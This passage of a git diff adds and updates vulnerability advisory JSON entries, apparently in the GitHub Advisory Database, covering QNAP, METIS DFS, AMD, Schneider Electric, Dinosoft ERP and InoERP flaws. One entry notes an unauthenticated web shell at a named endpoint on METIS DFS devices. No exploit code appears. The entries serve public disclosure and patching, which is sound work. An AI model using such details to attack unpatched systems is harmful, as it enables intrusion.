b/advisories/unreviewed/2026/02/GHSA-3x5q-gxp5-wv27/GHSA-3x5q-gxp5-wv27.json new file mode 100644 index 0000000000000..acfe777ec4dbf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3x5q-gxp5-wv27/GHSA-3x5q-gxp5-wv27.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3x5q-gxp5-wv27", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2026-2249" + ], + "details": "METIS DFS devices (versions <= oscore 2.1.234-r18) expose a web-based shell at the /console endpoint that does not require authentication. Accessing this endpoint allows a remote attacker to execute arbitrary operating system commands with 'daemon' privileges. This results in the compromise of the software, granting unauthorized access to modify configuration, read and alter sensitive data, or disrupt services.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2249" + }, + { + "type": "WEB", + "url": "https://www.metis.tech" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-45q5-pv8q-m46g/GHSA-45q5-pv8q-m46g.json b/advisories/unreviewed/2026/02/GHSA-45q5-pv8q-m46g/GHSA-45q5-pv8q-m46g.json new file mode 100644 index 0000000000000..7a8a2717ef010 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-45q5-pv8q-m46g/GHSA-45q5-pv8q-m46g.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-45q5-pv8q-m46g", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-52869" + ], + "details": "A buffer overflow vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to modify memory or crash processes.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52869" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4chc-49pc-wcqq/GHSA-4chc-49pc-wcqq.json b/advisories/unreviewed/2026/02/GHSA-4chc-49pc-wcqq/GHSA-4chc-49pc-wcqq.json new file mode 100644 index 0000000000000..903e8d876818e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4chc-49pc-wcqq/GHSA-4chc-49pc-wcqq.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4chc-49pc-wcqq", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-52870" + ], + "details": "A buffer overflow vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to modify memory or crash processes.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52870" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4r22-3675-4h3p/GHSA-4r22-3675-4h3p.json b/advisories/unreviewed/2026/02/GHSA-4r22-3675-4h3p/GHSA-4r22-3675-4h3p.json new file mode 100644 index 0000000000000..c2192d307103b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4r22-3675-4h3p/GHSA-4r22-3675-4h3p.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4r22-3675-4h3p", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-57710" + ], + "details": "An allocation of resources without limits or throttling vulnerability has been reported to affect Qsync Central. If a remote attacker gains an administrator account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57710" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4rf7-qgf8-847c/GHSA-4rf7-qgf8-847c.json b/advisories/unreviewed/2026/02/GHSA-4rf7-qgf8-847c/GHSA-4rf7-qgf8-847c.json new file mode 100644 index 0000000000000..e579a14947b12 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4rf7-qgf8-847c/GHSA-4rf7-qgf8-847c.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4rf7-qgf8-847c", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2025-48508" + ], + "details": "Improper Hardware reset flow logic in the GPU GFX Hardware IP block could allow a privileged attacker in a guest virtual machine to control reset operation potentially causing host or GPU crash or reset resulting in denial of service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48508" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6024.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1245" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-59g4-3crj-9w92/GHSA-59g4-3crj-9w92.json b/advisories/unreviewed/2026/02/GHSA-59g4-3crj-9w92/GHSA-59g4-3crj-9w92.json new file mode 100644 index 0000000000000..81ec8a5a69a0b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-59g4-3crj-9w92/GHSA-59g4-3crj-9w92.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-59g4-3crj-9w92", + "modified": "2026-02-11T15:30:26Z", + "published": "2026-02-11T15:30:26Z", + "aliases": [ + "CVE-2025-62856" + ], + "details": "A path traversal vulnerability has been reported to affect File Station 5. If a local attacker gains an administrator account, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5190 and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62856" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5cc2-fh28-2crw/GHSA-5cc2-fh28-2crw.json b/advisories/unreviewed/2026/02/GHSA-5cc2-fh28-2crw/GHSA-5cc2-fh28-2crw.json new file mode 100644 index 0000000000000..24b50b0c9691c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5cc2-fh28-2crw/GHSA-5cc2-fh28-2crw.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5cc2-fh28-2crw", + "modified": "2026-02-11T15:30:26Z", + "published": "2026-02-11T15:30:26Z", + "aliases": [ + "CVE-2025-58471" + ], + "details": "An allocation of resources without limits or throttling vulnerability has been reported to affect Qsync Central. If a remote attacker gains an administrator account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.2.0.1 ( 2025/12/21 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58471" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-673q-8hc3-p8qm/GHSA-673q-8hc3-p8qm.json b/advisories/unreviewed/2026/02/GHSA-673q-8hc3-p8qm/GHSA-673q-8hc3-p8qm.json new file mode 100644 index 0000000000000..81aa6239b046f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-673q-8hc3-p8qm/GHSA-673q-8hc3-p8qm.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-673q-8hc3-p8qm", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-54148" + ], + "details": "A NULL pointer dereference vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54148" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-67mv-4hj2-xp3g/GHSA-67mv-4hj2-xp3g.json b/advisories/unreviewed/2026/02/GHSA-67mv-4hj2-xp3g/GHSA-67mv-4hj2-xp3g.json new file mode 100644 index 0000000000000..a71b7a7cc3018 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-67mv-4hj2-xp3g/GHSA-67mv-4hj2-xp3g.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-67mv-4hj2-xp3g", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2026-1227" + ], + "details": "CWE-611: Improper Restriction of XML External Entity Reference vulnerability exists that could cause unauthorized disclosure of local files, interaction within the EBO system, or denial of service conditions when a local user uploads a specially crafted TGML graphics file to the EBO server from Workstation.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1227" + }, + { + "type": "WEB", + "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-041-02&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2026-041-02.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-611" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-682g-84mv-mcxh/GHSA-682g-84mv-mcxh.json b/advisories/unreviewed/2026/02/GHSA-682g-84mv-mcxh/GHSA-682g-84mv-mcxh.json new file mode 100644 index 0000000000000..5a595f7141ca4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-682g-84mv-mcxh/GHSA-682g-84mv-mcxh.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-682g-84mv-mcxh", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-54162" + ], + "details": "A path traversal vulnerability has been reported to affect File Station 5. If a remote attacker gains an administrator account, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5068 and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54162" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6j8r-j98h-9g9f/GHSA-6j8r-j98h-9g9f.json b/advisories/unreviewed/2026/02/GHSA-6j8r-j98h-9g9f/GHSA-6j8r-j98h-9g9f.json index 8c9233ed50a49..63b32854e8046 100644 --- a/advisories/unreviewed/2026/02/GHSA-6j8r-j98h-9g9f/GHSA-6j8r-j98h-9g9f.json +++ b/advisories/unreviewed/2026/02/GHSA-6j8r-j98h-9g9f/GHSA-6j8r-j98h-9g9f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6j8r-j98h-9g9f", - "modified": "2026-02-11T12:30:21Z", + "modified": "2026-02-11T15:30:21Z", "published": "2026-02-02T15:30:34Z", "aliases": [ "CVE-2026-1761" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:2514" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:2513" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:2512" diff --git a/advisories/unreviewed/2026/02/GHSA-6mvg-6pj4-7q9q/GHSA-6mvg-6pj4-7q9q.json b/advisories/unreviewed/2026/02/GHSA-6mvg-6pj4-7q9q/GHSA-6mvg-6pj4-7q9q.json new file mode 100644 index 0000000000000..a34b244a9004c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6mvg-6pj4-7q9q/GHSA-6mvg-6pj4-7q9q.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6mvg-6pj4-7q9q", + "modified": "2026-02-11T15:30:26Z", + "published": "2026-02-11T15:30:26Z", + "aliases": [ + "CVE-2025-58467" + ], + "details": "A relative path traversal vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58467" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-23" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7369-4q85-89cw/GHSA-7369-4q85-89cw.json b/advisories/unreviewed/2026/02/GHSA-7369-4q85-89cw/GHSA-7369-4q85-89cw.json new file mode 100644 index 0000000000000..6b3acadb7990a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7369-4q85-89cw/GHSA-7369-4q85-89cw.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7369-4q85-89cw", + "modified": "2026-02-11T15:30:26Z", + "published": "2026-02-11T15:30:26Z", + "aliases": [ + "CVE-2025-8025" + ], + "details": "Missing Authentication for Critical Function, Improper Access Control vulnerability in Dinosoft Business Solutions Dinosoft ERP allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Dinosoft ERP: from < 3.0.1 through 11022026.\n\nNOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8025" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0059" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-76mg-x9r8-w496/GHSA-76mg-x9r8-w496.json b/advisories/unreviewed/2026/02/GHSA-76mg-x9r8-w496/GHSA-76mg-x9r8-w496.json new file mode 100644 index 0000000000000..20497e0975bc0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-76mg-x9r8-w496/GHSA-76mg-x9r8-w496.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-76mg-x9r8-w496", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-54163" + ], + "details": "A NULL pointer dereference vulnerability has been reported to affect File Station 5. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5166 and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54163" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7gxv-gvrv-j982/GHSA-7gxv-gvrv-j982.json b/advisories/unreviewed/2026/02/GHSA-7gxv-gvrv-j982/GHSA-7gxv-gvrv-j982.json new file mode 100644 index 0000000000000..7bfb3ee972929 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7gxv-gvrv-j982/GHSA-7gxv-gvrv-j982.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7gxv-gvrv-j982", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2019-25312" + ], + "details": "InoERP 0.7.2 contains a persistent cross-site scripting vulnerability in the comment section that allows unauthenticated attackers to inject malicious scripts. Attackers can submit comments with JavaScript payloads that execute in other users' browsers, potentially stealing cookies and session information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25312" + }, + { + "type": "WEB", + "url": "https://github.com/inoerp/inoERP" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47428" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/inoerp-persistent-cross-site-scripting" + }, + { + "type": "WEB", + "url": "http://inoideas.org" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-87q4-v2f4-jh82/GHSA-87q4-v2f4-jh82.json b/advisories/unreviewed/2026/02/GHSA-87q4-v2f4-jh82/GHSA-87q4-v2f4-jh82.json new file mode 100644 index 0000000000000..934388965e87c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-87q4-v2f4-jh82/GHSA-87q4-v2f4-jh82.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-87q4-v2f4-jh82", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-54151" + ], + "details": "An uncontrolled resource consumption vulnerability has been reported to affect Qsync Central. If a local attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54151" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8863-jvcv-whf3/GHSA-8863-jvcv-whf3.json b/advisories/unreviewed/2026/02/GHSA-8863-jvcv-whf3/GHSA-8863-jvcv-whf3.json new file mode 100644 index 0000000000000..008467574dd35 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8863-jvcv-whf3/GHSA-8863-jvcv-whf3.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8863-jvcv-whf3", + "modified": "2026-02-11T15:30:26Z", + "published": "2026-02-11T15:30:26Z", + "aliases": [ + "CVE-2025-66278" + ], + "details": "A path traversal vulnerability has been reported to affect File Station 5. If a remote attacker gains a user account, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5190 and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66278" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8fjj-5wqp-475m/GHSA-8fjj-5wqp-475m.json b/advisories/unreviewed/2026/02/GHSA-8fjj-5wqp-475m/GHSA-8fjj-5wqp-475m.json new file mode 100644 index 0000000000000..d24edbe55ff8e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8fjj-5wqp-475m/GHSA-8fjj-5wqp-475m.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8fjj-5wqp-475m", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2024-36316" + ], + "details": "The integer overflow vulnerability within AMD Graphics driver could allow an attacker to bypass size checks potentially resulting in a denial of service", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-36316" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6024.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-190" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8v4p-4wrw-v43w/GHSA-8v4p-4wrw-v43w.json b/advisories/unreviewed/2026/02/GHSA-8v4p-4wrw-v43w/GHSA-8v4p-4wrw-v43w.json new file mode 100644 index 0000000000000..5ebf76fda108a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8v4p-4wrw-v43w/GHSA-8v4p-4wrw-v43w.json @@ -0,0 +1,44 @@ 